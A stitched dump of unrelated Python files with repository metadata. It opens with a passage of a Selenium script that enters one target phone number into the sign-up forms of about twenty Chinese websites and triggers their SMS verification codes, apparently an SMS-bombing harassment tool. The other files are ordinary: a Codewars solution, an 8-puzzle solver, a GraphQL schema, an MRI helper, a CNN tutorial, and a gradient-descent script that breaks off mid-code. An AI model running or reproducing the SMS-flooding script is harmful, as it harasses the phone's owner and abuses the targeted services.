browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click()
browser.quit()
# 嗨厨房
def func12(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://m.haichufang.com/reg.html')
browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click()
browser.quit()
# 好美家
def func13(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.jaja123.com/web/register')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click()
browser.quit()
# 小米
def func14(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN')
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click()
browser.quit()
# 巨人网络
def func15(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://reg.ztgame.com/')
browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click()
browser.quit()
# 微盟
def func16(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.weimob.com/register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click()
browser.quit()
# 商品宅配
def func17(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php')
browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞')
browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="submit_img5"]').click()
browser.quit()
# 快乐购
def func18(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.happigo.com/register/')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_auth_code"]').click()
browser.quit()
# 手机中国
def func19(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.cnmo.com/register/')
browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_getcode"]').click()
browser.quit()
# 苏宁
def func20(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://reg.suning.com/person.do')
browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click()
browser.quit()
# 爱奇艺
def func21(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&')
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click()
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click()
browser.quit()
def func22(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.facebank.cn/user.html')
# browser.switch_to.alert()
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="getSmsCode"]').click()
time.sleep(1)
browser.quit()
# 支付宝
def func23(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://memberprod.alipay.com/account/reg/index.htm')
# 焦点问题未解决,支付宝接口无效
browser.quit()
# 粉笔网
def func24(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://fenbi.com/web/signup')
# 弹窗问题,接口无效
browser.quit()
def func25(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw')
browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click()
browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click()
browser.quit()
def func26(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.maifupay.com/register')
browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click()
browser.quit()
def func27(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=')
browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click()
browser.quit()
def func28(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.decathlon.com.cn/zh/create')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="login-button"]').click()
time.sleep(1)
browser.quit()
# 迅雷
def func29(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy')
# 类似支付宝页面无法解决焦点问题,猜测用JS解决
browser.quit()
def func30(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://my.ruanmei.com/?page=register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms"]').click()
browser.quit()
def func31(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.juhe.cn/register')
browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click()
time.sleep(1)
browser.quit()
def func32(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F')
browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click()
browser.quit()
def func33(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://wap.51kid.com/a/free-lesson')
browser.find_element_by_xpath('//*[@id="wechat"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="apply"]/div[3]/div').click()
browser.quit()
|
[
"[email protected]"
] | |
e4d683794d458ed13eab1f94478c4c152a35abfa
|
c885656dc11b4a0becd6bee5ada7ebb7927d090f
|
/Fundamentals/phone_directory.py
|
5eac7c1f4309d7c64a31b0353cf36690f4ef2652
|
[] |
no_license
|
nlpet/codewars
|
804da896cd608ae842442098383a8685a809158c
|
b53a2006a499350d846524f45966dafef035cd71
|
refs/heads/master
| 2021-06-24T08:55:31.663474 | 2017-07-19T11:09:12 | 2017-07-19T11:09:12 | 83,186,729 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,565 |
py
|
r"""
Phone directory problem on codewars.
John keeps a backup of his old personal phone book as a text file. On each line
of the file he can find the phone number (formated as +X-abc-def-ghijwhere X stands
for one or two digits), the corresponding name between < and > and the address.
Unfortunately everything is mixed, things are not always in the same order,
lines are cluttered with non-alpha-numeric characters.
Examples of John's phone book lines:
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n"
" 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n"
Could you help John with a program that, given the lines of his phone book and a phone
number returns a string for this number : "Phone => num, Name => name, Address => adress"
Examples:
s = "/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green,
Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
phone(s, "1-541-754-3010") should return "Phone => 1-541-754-3010,
Name => J Steeve, Address => 156 Alphand St."
It can happen that, for a few phone numbers, there are many people
for a phone number -say nb- , then
return : "Error => Too many people: nb"
or it can happen that the number nb is not in the phone book, in that case
return: "Error => Not found: nb"
"""
import re
import sys
sys.path.append('..')
from helpers.test_wrapper import Test
def phone(strng, num):
match_phone = re.findall(num, strng)
found = 0
result = 'Error => Not found: {}'.format(num)
if len(match_phone) == 0:
return result
for line in strng.split('\n'):
match_phone = re.search(num, line)
if match_phone:
name = re.sub(".*<(.*)>.*", "\g<1>", line)
if re.sub(".*<(.*)>.*", "\g<1>", result):
found += 1
clean_line = line.replace(num, '').replace(name, '')
addr = " ".join(re.sub("[^a-zA-Z0-9\.-]", " ", clean_line).split())
result = 'Phone => {}, Name => {}, Address => {}'.format(num, name, addr)
if found > 1:
result = 'Error => Too many people: {}'.format(num)
return result
def run_tests():
with Test() as test:
dr = (
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010;\n"
"+1-541-984-3012 <P Reed> /PO Box 530; Pollocksville, NC-28573\n :+1-321-512-2222 <Paul Dive> Sequoia Alley PQ-67209\n"
"+1-741-984-3090 <Peter Reedgrave> _Chicago\n :+1-921-333-2222 <Anna Stevens> Haramburu_Street AA-67209\n"
"+1-111-544-8973 <Peter Pan> LA\n +1-921-512-2222 <Wilfrid Stevens> Wild Street AA-67209\n"
"<Peter Gone> LA ?+1-121-544-8974 \n <R Steell> Quora Street AB-47209 +1-481-512-2222!\n"
"<Arthur Clarke> San Antonio $+1-121-504-8974 TT-45120\n <Ray Chandler> Teliman Pk. !+1-681-512-2222! AB-47209,\n"
"<Sophia Loren> +1-421-674-8974 Bern TP-46017\n <Peter O'Brien> High Street +1-908-512-2222; CC-47209\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n <P Salinger> Main Street, +1-098-512-2222, Denver\n"
"<C Powel> *+19-421-674-8974 Chateau des Fosses Strasbourg F-68000\n <Bernard Deltheil> +1-498-512-2222; Mount Av. Eldorado\n"
"+1-099-500-8000 <Peter Crush> Labrador Bd.\n +1-931-512-4855 <William Saurin> Bison Street CQ-23071\n"
"<P Salinge> Main Street, +1-098-512-2222, Denve\n"
)
def testing(actual, expected):
test.assert_equals(actual, expected)
test.describe("phone")
test.it("Basic tests")
testing(phone(dr, "48-421-674-8974"), "Phone => 48-421-674-8974, Name => Anastasia, Address => Via Quirinal Roma")
testing(phone(dr, "1-921-512-2222"), "Phone => 1-921-512-2222, Name => Wilfrid Stevens, Address => Wild Street AA-67209")
testing(phone(dr, "1-908-512-2222"), "Phone => 1-908-512-2222, Name => Peter O'Brien, Address => High Street CC-47209")
testing(phone(dr, "1-541-754-3010"), "Phone => 1-541-754-3010, Name => J Steeve, Address => 156 Alphand St.")
testing(phone(dr, "1-121-504-8974"), "Phone => 1-121-504-8974, Name => Arthur Clarke, Address => San Antonio TT-45120")
testing(phone(dr, "1-498-512-2222"), "Phone => 1-498-512-2222, Name => Bernard Deltheil, Address => Mount Av. Eldorado")
testing(phone(dr, "1-098-512-2222"), "Error => Too many people: 1-098-512-2222")
testing(phone(dr, "5-555-555-5555"), "Error => Not found: 5-555-555-5555")
if __name__ == '__main__':
run_tests()
|
[
"[email protected]"
] | |
adc3b4f80abdaf533b97d9b62f5538e55b5a821b
|
9b90373955433cdfa8806373ff343a471a1adcc1
|
/src/algorithms/07-eight-puzzle-game/puzzle.py
|
588dfe7e1d947e7edea11228791b0e78357e64c7
|
[
"MIT"
] |
permissive
|
SamVanhoutte/python-musings
|
0a69f44dc8321792df2a6f57c5821ed52784dcf6
|
18e9b6b366af6c072a5d928f95f30ea88f01f540
|
refs/heads/master
| 2021-07-25T18:39:59.328235 | 2020-05-18T06:41:08 | 2020-05-18T06:41:08 | 171,827,369 | 0 | 0 |
MIT
| 2019-12-24T09:05:16 | 2019-02-21T08:03:45 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 5,387 |
py
|
from random import shuffle, choice
import numpy as np
import math
class Puzzle:
board = [[]]
depth = 0
_goal = [[1, 2, 3],[4, 0, 5], [6, 7, 8]]
def __init__(self, signature:str = None):
if(signature!=None):
self.board = np.zeros((3, 3), int)
seq = 0
for row in range(0, 3):
for col in range(0, 3):
self.board[row][col] = 0 if signature[seq]==' ' else signature[seq]
seq += 1
else:
#print('Making 200 random moves from the goal state back')
# start from the goal and start randomly moving around 20 times
self.board = np.copy(self._goal)
for _ in range(200) :
move = choice(self.get_available_moves())
self.move_cell(move[0], move[1])
def set_state(self, board):
self.board = board
def __str__(self):
hor_line = '---------------\n'
result = ''
for row in self.board:
for cell in row:
if (cell!=0):
result += '| ' + str(cell) + ' |'
else:
result += '| |'
result += '\n'
return result
def get_open_cell(self):
for row in range(0, 3):
for col in range(0, 3):
if(self.board[row][col]==0):
return row, col
def get_signature(self):
# return unique string to check if state has been used already
result = ''
for row in self.board:
for cell in row:
result += str(cell) if cell != 0 else ' '
return result + ':' + str(self.depth)
def get_available_moves(self):
open_row, open_col = self.get_open_cell()
available_moves = list()
# check horizontal moves
if(open_col-1) >= 0:
available_moves.append((open_row, open_col - 1))
if(open_col+1) < 3:
available_moves.append((open_row, open_col + 1))
# check vertical moves
if(open_row-1) >= 0:
available_moves.append((open_row - 1, open_col))
if(open_row+1) < 3:
available_moves.append((open_row + 1, open_col))
return available_moves
def completed(self):
return (np.array(self.board) == np.array(self._goal)).all()
def move_cell(self,row:int, col:int):
# check if move is valid
open_row, open_col = self.get_open_cell()
self.board[open_row][open_col] = self.board[row][col]
self.board[row][col] = 0
def clone(self):
cloned_puzzle = Puzzle()
cloned_puzzle.set_state(np.copy(self.board))
cloned_puzzle.depth = self.depth
return cloned_puzzle
def evaluate(self, evaluation_method: str = 'fair'):
if(evaluation_method=='good'):
return self._evaluate_nilsson_sequence()
elif(evaluation_method=='fair'):
return self._evaluate_manhattan()
elif(evaluation_method=='weak'):
return self._evaluate_hamming()
elif(evaluation_method=='bad'):
return self._evaluate_opposites()
def _evaluate_manhattan(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile>0):
for m in range(0, 3):
for n in range(0, 3):
if tile == self._goal[m][n]:
sum += abs(row-m) + abs(col-n)
return sum
def _evaluate_nilsson_sequence(self):
# inspired by the answer here: https://cs.stackexchange.com/questions/1904/nilssons-sequence-score-for-8-puzzle-problem-in-a-algorithm?rq=1
# if the empty box is not in the middle, start with cost 1
total_score = 0 if self.board[1][1]==0 else 1
# add manhattan distance cost
distance_cost = self._evaluate_manhattan()
# successors
successor_cost = 0
goal_pairs = list([[1,2],[2,3],[3,5],[5,8],[8,7],[7,6],[6,4],[4,1]])
if([self.board[0][0],self.board[0][1]] not in goal_pairs): successor_cost+=1
if([self.board[0][1],self.board[0][2]] not in goal_pairs): successor_cost+=1
if([self.board[0][2],self.board[1][2]] not in goal_pairs): successor_cost+=1
if([self.board[1][2],self.board[2][2]] not in goal_pairs): successor_cost+=1
if([self.board[2][2],self.board[2][1]] not in goal_pairs): successor_cost+=1
if([self.board[2][1],self.board[2][0]] not in goal_pairs): successor_cost+=1
if([self.board[2][0],self.board[1][0]] not in goal_pairs): successor_cost+=1
return distance_cost + 3 * (total_score + 2*successor_cost)
def _evaluate_hamming(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile!=self._goal[row][col]):
sum += 1
return sum
def _evaluate_opposites(self):
sum = 0
sum += abs(self.board[0][0] - self.board[2][2])
sum += abs(self.board[0][1] - self.board[2][1])
sum += abs(self.board[0][2] - self.board[2][0])
sum += abs(self.board[1][0] - self.board[1][2])
return abs(16-sum)
|
[
"[email protected]"
] | |
acbabc06e4dc6b096ab6dffc2dd92e71c90c3e59
|
3a08e9facc8df83f8e8eed4859ef59ee5200aa14
|
/rough_trade_calendar/graphql.py
|
f3894ce294cb936586401b752f32f355cd2302b4
|
[
"MIT"
] |
permissive
|
craiga/rough-trade-calendar
|
c7fe9125949a7ff1ac38acf73d51765ffbed8ad4
|
175c61391a50eaa4ada3dbc062158773cf72d9c0
|
refs/heads/main
| 2021-11-11T07:50:02.808052 | 2021-08-11T13:07:16 | 2021-08-11T13:07:16 | 194,937,687 | 1 | 1 |
MIT
| 2021-11-09T08:09:42 | 2019-07-02T21:32:28 |
HTML
|
UTF-8
|
Python
| false | false | 1,875 |
py
|
"""
GraphQL + Relay interface to Rough Trade Calendar data.
"""
import django_filters
import graphene
import graphene.relay
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from rough_trade_calendar import models
class CountConnection(graphene.Connection):
"""A connection which supports Relay's totalCount field."""
total_count = graphene.Int()
def resolve_total_count(self, *args): # pylint: disable=unused-argument
return self.length # pylint: disable=no-member
class Meta:
abstract = True
class EventFilterSet(django_filters.FilterSet):
"""Filter and order events by start_at."""
start_after = django_filters.DateTimeFilter("start_at", "gt")
start_before = django_filters.DateTimeFilter("start_at", "lt")
order_by = django_filters.OrderingFilter(fields={"start_at": "startAt"})
class Meta:
model = models.Event
fields = ["start_after", "start_before"]
class Event(DjangoObjectType):
"""An event."""
class Meta:
model = models.Event
fields = [
"id",
"name",
"description",
"url",
"image_url",
"start_at",
"location",
]
filterset_class = EventFilterSet
interfaces = [graphene.relay.Node]
connection_class = CountConnection
class Location(DjangoObjectType):
"""A location."""
class Meta:
model = models.Location
fields = ["id", "name", "timezone", "events"]
interfaces = [graphene.relay.Node]
connection_class = CountConnection
filter_fields = {"name": ["exact", "contains"]}
class Query(graphene.ObjectType):
all_locations = DjangoFilterConnectionField(Location, description="All locations.")
schema = graphene.Schema(query=Query)
|
[
"[email protected]"
] | |
1a2f1f8498afde855fe2f89df29272d73550da39
|
100d4ef3ac2d288b45430650730eaff1a0e5fb05
|
/Backend/process.py
|
eaf6e61e7206b9b33d40f2d9ed2f7f4695aeb092
|
[] |
no_license
|
billbai0102/SGMT
|
107782b862031deaca1ac91e4b225b9199e4eab2
|
c8303effc8dfada9e5381b09e17e350c5ca8c094
|
refs/heads/main
| 2022-12-26T17:35:57.738188 | 2020-10-07T14:37:38 | 2020-10-07T14:37:38 | 300,917,335 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
import cv2
import torch
import numpy as np
def preprocess_mri(image):
image = cv2.resize(image, (256, 256))
image = torch.tensor(image.astype(np.float32))
image = image.unsqueeze(0)
image = image.permute(0, 3, 1, 2)
return image
def postprocess_mask(mask):
mask = mask.detach()
mask = mask.cpu()
mask = mask.numpy()[0, 0, :, :] # grayscale to rgb
return mask
|
[
"[email protected]"
] | |
15959d749cf76018d3d00dfa9cafa9d7699348b9
|
7e820bcff319b61b0905f6839743155a450d3cfb
|
/data/scripts/xyf.py
|
57902dd0f473723f1289508d0ca1306bffb99c78
|
[] |
no_license
|
ShadowLugia650/pokemon-tcg
|
6636a12f15ab5f0fe2b4da85056d844651ec6f33
|
333df6e0303acac361140501b4f98f9c45296435
|
refs/heads/master
| 2022-11-19T23:02:12.657279 | 2020-06-28T04:31:59 | 2020-06-28T04:31:59 | 257,483,793 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
py
|
from data.scripts._util import check_energy_cost
def scratch(attacker, defender):
check_energy_cost(attacker, 1)
defender.take_damage(10, attacker)
def tailsmack(attacker, defender):
check_energy_cost(attacker, 2)
defender.take_damage(20, attacker)
|
[
"[email protected]"
] | |
a747f23ed4a39749024d5edcb173888590294a8f
|
fc220ec70c38972e97a9b549c14262a5ed1aa6a9
|
/mac/__init__.py
|
8ea3bdb9386d6db6e470175f089de02e8886e1be
|
[] |
no_license
|
adrienpaysant/hashesAndMACs
|
adbb1ab869a4a2d14a002ab8dae340473c33f9af
|
0454ed8499aa82d06ea713c66bc5d58628249264
|
refs/heads/main
| 2023-04-17T05:47:52.372755 | 2021-04-29T13:48:32 | 2021-04-29T13:48:32 | 358,198,378 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
from .communication import send_message_digest, get_message_digest, get_message, get_digest, send_message, send_digest
__all__ = [ 'send_message_digest', 'get_message_digest', 'get_message', 'get_digest', 'send_message', 'send_digest']
|
[
"[email protected]"
] | |
1d4206c56fddce6446aff8d1c579022e0ed24186
|
b3a79effcc09df60100dd28d333b60be99ed75a2
|
/app/salaries/migrations/0002_salary.py
|
1601ad14a7d51cdf8bfb44c9de34fd1f64744256
|
[] |
no_license
|
claytonrm/upsalary-django-project
|
b4d4e021b280b72bf50b4d08e77b940787622d74
|
6d9de78c189d78a5ce237062a54256b28b82bd60
|
refs/heads/master
| 2023-08-03T14:42:36.020401 | 2020-07-09T14:37:09 | 2020-07-09T14:37:09 | 265,437,864 | 0 | 0 | null | 2021-09-22T19:02:53 | 2020-05-20T03:19:58 |
Python
|
UTF-8
|
Python
| false | false | 678 |
py
|
# Generated by Django 3.0.6 on 2020-05-20 18:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('salaries', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Salary',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, max_digits=19)),
('taxes', models.DecimalField(decimal_places=2, max_digits=19)),
('received_at', models.DateTimeField(editable=False)),
],
),
]
|
[
"[email protected]"
] | |
0efae463197cf4b67c08549dc4459158bc1c5d11
|
a3c7c11c607800155457ea1f886e2d84eadd9610
|
/examples/3_NeuralNetworks/convolutional_network.py
|
17aa1d84f64834e38d5523b130d66d3e697d1ee0
|
[
"MIT"
] |
permissive
|
353622088/CapsNet
|
eddba478143bd092ce27bd49dbb65c63d80824e4
|
04408978dfccd9a6545fc250648fd2f600974a95
|
refs/heads/master
| 2021-08-28T02:22:56.958370 | 2017-12-11T03:03:52 | 2017-12-11T03:03:52 | 112,295,252 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,934 |
py
|
""" Convolutional Neural Network.
Build and train a convolutional neural network with TensorFlow.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
This example is using TensorFlow layers API, see 'convolutional_network_raw'
example for a raw implementation with variables.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("../tmp/data/", one_hot=False)
import tensorflow as tf
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.75 # Dropout, probability to keep units
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
# Because Dropout have different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False,
is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True,
is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
print(logits_train.shape)
print(labels.shape)
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
# tf.summary.scalar(name='loss', tensor=loss_op)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op,
global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# merge_all_op = tf.summary.merge_all()
# TF Estimators requires to return a EstimatorSpec, that specify
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn, model_dir='logdir')
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
e = model.evaluate(input_fn)
print("Testing Accuracy:", e['accuracy'])
|
[
"[email protected]"
] | |
8f5adc4fc685a863c2fb0e954b71e6b597fbc626
|
0ff5a88f42d5e6179583a3251b892b93cf1f6d0d
|
/L1/1_3/1_3_stochastic_gradient_descent.py
|
0eb1234bf20283ced231ac91396577bf9e55c02c
|
[] |
no_license
|
kaz-nakazawa/DL_E_report
|
a6027f6197b061b63fd7cda022ec12dd10b87cf3
|
c3f8ed72d04a2c35c5da075ba5747c8f9c1bea84
|
refs/heads/master
| 2020-06-12T23:49:39.019418 | 2019-07-15T08:29:14 | 2019-07-15T08:29:14 | 194,465,072 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,701 |
py
|
# coding: utf-8
# 確率勾配降下法
import sys, os
sys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定
import numpy as np
from common import functions
import matplotlib.pyplot as plt
def print_vec(text, vec):
print("*** " + text + " ***")
print(vec)
#print("shape: " + str(x.shape))
print("")
# サンプルとする関数
#yの値を予想するAI
def f(x):
y = 3 * x[0] + 2 * x[1]
return y
# 初期設定
def init_network():
# print("##### ネットワークの初期化 #####")
network = {}
nodesNum = 10
network['W1'] = np.random.randn(2, nodesNum)
network['W2'] = np.random.randn(nodesNum)
network['b1'] = np.random.randn(nodesNum)
network['b2'] = np.random.randn()
# print_vec("重み1", network['W1'])
# print_vec("重み2", network['W2'])
# print_vec("バイアス1", network['b1'])
# print_vec("バイアス2", network['b2'])
return network
# 順伝播
def forward(network, x):
# print("##### 順伝播開始 #####")
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
u1 = np.dot(x, W1) + b1
z1 = functions.relu(u1)
## 試してみよう
#z1 = functions.sigmoid(u1)
u2 = np.dot(z1, W2) + b2
y = u2
# print_vec("総入力1", u1)
# print_vec("中間層出力1", z1)
# print_vec("総入力2", u2)
# print_vec("出力1", y)
# print("出力合計: " + str(np.sum(y)))
return z1, y
# 誤差逆伝播
def backward(x, d, z1, y):
# print("\n##### 誤差逆伝播開始 #####")
grad = {}
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
# 出力層でのデルタ
delta2 = functions.d_mean_squared_error(d, y)
# b2の勾配
grad['b2'] = np.sum(delta2, axis=0)
# W2の勾配
grad['W2'] = np.dot(z1.T, delta2)
# 中間層でのデルタ
